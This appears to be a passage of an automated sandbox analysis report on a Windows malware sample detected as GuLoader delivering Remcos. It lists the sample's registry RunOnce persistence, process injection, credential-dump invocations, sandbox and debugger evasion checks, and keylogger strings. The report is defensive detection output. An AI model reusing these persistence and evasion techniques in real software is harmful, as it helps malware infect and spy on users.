Source: g4FtSOZMD9.exe, 00000009.00000003.605678171.0000000001C83000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe | Binary or memory string: OriginalFileName vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000015.00000000.606786406.0000000000431000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe | Binary or memory string: OriginalFilename vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000016.00000001.608400388.0000000000422000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000017.00000000.609082555.0000000000431000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe | Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: g4FtSOZMD9.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: g4FtSOZMD9.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Restroke.exe.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Restroke.exe.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Restroke.exe.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: g4FtSOZMD9.exe | Virustotal: Detection: 22%
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | File read: C:\Users\user\Desktop\g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | File created: C:\Users\user\AppData\Roaming\Screenshots
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | File created: C:\Users\user\AppData\Local\Temp\~DFF48BD71CF1E747D1.TMP
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@11/24@1/2
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, g4FtSOZMD9.exe, 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Mutant created: \Sessions\1\BaseNamedObjects\Remcos-UGB110
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_0041208B FindResourceA,SizeofResource,LoadResource,LockResource,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | File opened: C:\Users\user\Desktop\g4FtSOZMD9.cfg
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Unpacked PE file: 22.2.g4FtSOZMD9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Unpacked PE file: 23.2.g4FtSOZMD9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Yara detected GuLoader
Source: Yara match | File source: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.462063926.00000000017A0000.00000040.00000001.sdmp, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match | File source: Process Memory Space: g4FtSOZMD9.exe PID: 7068, type: MEMORYSTR
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_00401F3C push eax; iretd
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_0228CE2E push edx; retf 2D64h
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02281E90 push esi; retn E555h
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02281E90 push esp; retf E809h
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_0228011A push ds; ret
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_01C7C4BD push esp; iretd
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_01C7CB54 push eax; retf
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_01C7CF54 push eax; iretd
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_01C7CB50 push eax; retf
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_01C7CF50 push eax; iretd
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_01C7CB64 pushad ; retf
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_01C7CF64 pushad ; iretd
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_01C7CB60 pushad ; retf
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_01C7CF60 pushad ; iretd
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_01C7CB68 push 6801C7CBh; retf
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_01C7CF68 push 6801C7CFh; iretd
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0044693D push ecx; ret
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_004189F0 push FFFFFFAEh; iretd
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_00418981 push FFFFFFAEh; iretd
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0044DB70 push eax; ret
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0044DB70 push eax; ret
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_00451D54 push eax; ret
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00414060 push eax; ret
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00414060 push eax; ret
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00414039 push ecx; ret
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_004164EB push 0000006Ah; retf
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00416553 push 0000006Ah; retf
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00416555 push 0000006Ah; retf
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_00444355 push ecx; ret
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_004446D0 push eax; ret
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_004446D0 push eax; ret
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00404C9D LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | File created: C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect Any.run
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | File opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | File opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=\RESTROKE.EXE\BREVSAMLINGSSTEDS8SET W = CREATEOBJECT("WSCRIPT.SHELL")
          Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL\RESTROKE.EXE\BREVSAMLINGSSTEDS8SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCECHRYSOME
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe TID: 5760 | Thread sleep count: 543 > 30
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe TID: 528 | Thread sleep time: -1800000s >= -30000s
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Thread delayed: delay time: 600000
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Window / User API: threadDelayed 543
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Thread delayed: delay time: 600000
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | System information queried: ModuleInformation
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
          Source: g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=\Restroke.exe\Brevsamlingssteds8Set W = CreateObject("WScript.Shell")
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll\Restroke.exe\Brevsamlingssteds8Software\Microsoft\Windows\CurrentVersion\RunOnceCHRYSOME
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp | Binary or memory string: vmicvss
          Source: g4FtSOZMD9.exe, 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620803230.0000000001BD7000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
          Source: bhvFAB7.tmp.21.dr | Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:BE8AB8DF-DCD1-3523-4A95-3A04EAFF1CBA&ctry=US&time=20220102T102601Z&lc=en-US&pl=en-US&idtp=mid&uid=b029da70-c67b-4a7e-9bd5-517f7e302ed9&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=93a49fdf6de24d87bd311ffc5aadad28&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1324233&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1324233&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
          Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Data Exchange Service
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Heartbeat Service
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Service Interface
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp | Binary or memory string: vmicheartbeat
          Source: g4FtSOZMD9.exe, 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW$

          Anti Debugging:

          Hides threads from debuggers
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Thread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Thread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00404C9D LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_0228CE02 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02289E52 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02295252 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02294BE5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_022920B6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02292C8E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_022866C3 LdrInitializeThunk,

          HIPS / PFW / Operating System Protection Evasion:

          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Memory written: C:\Users\user\Desktop\g4FtSOZMD9.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Memory written: C:\Users\user\Desktop\g4FtSOZMD9.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Memory written: C:\Users\user\Desktop\g4FtSOZMD9.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"
          Source: g4FtSOZMD9.exe | Binary or memory string: [2022/01/02 02:28:02 Offline Keylogger Started] [2022/01/02 02:28:02 Program Manager]
          Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000009.00000002.620897284.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605956778.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmp | Binary or memory string: Program Manager
          Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: g4FtSOZMD9.exe, 00000009.00000003.605373507.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620916811.0000000001C8A000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582805331.0000000001C83000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605454693.0000000001C83000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605678171.0000000001C83000.00000004.00000001.sdmp | Binary or memory string: [2022/01/02 02:28:02 Program Manager]
          Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmp | Binary or memory string: &Program Manager
          Source: g4FtSOZMD9.exe, 00000009.00000003.605373507.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620897284.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605956778.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmp | Binary or memory string: Program Manager5
